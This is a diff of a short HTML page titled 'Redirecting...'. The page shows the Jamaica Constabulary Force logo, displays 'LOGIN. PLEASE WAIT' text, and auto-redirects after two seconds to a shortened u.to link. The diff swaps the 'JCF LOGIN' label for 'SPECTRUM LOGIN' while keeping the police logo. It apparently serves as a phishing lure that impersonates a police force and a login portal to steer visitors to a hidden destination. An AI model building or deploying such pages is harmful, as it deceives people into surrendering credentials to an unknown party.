--- a/f-cw.html
+++ b/f-cw.html
@@ -4,9 +4,9 @@
 <title>Redirecting...</title>
 <meta http-equiv="refresh" content="2; url = https://u.to/PElDIg" />
 </head>
-<P>JCF LOGIN
+<P>SPECTRUM LOGIN
 <body>
 <img src="https://seeklogo.com/images/J/Jamaica_Constabulary_Force-logo-466E87E8EA-seeklogo.com.png">
-<p>JCF LOGIN. PLEASE WAIT... Redirecting...</p>
+<p>SPECTRUM LOGIN. PLEASE WAIT... Redirecting...</p>
 </body>
 </html>
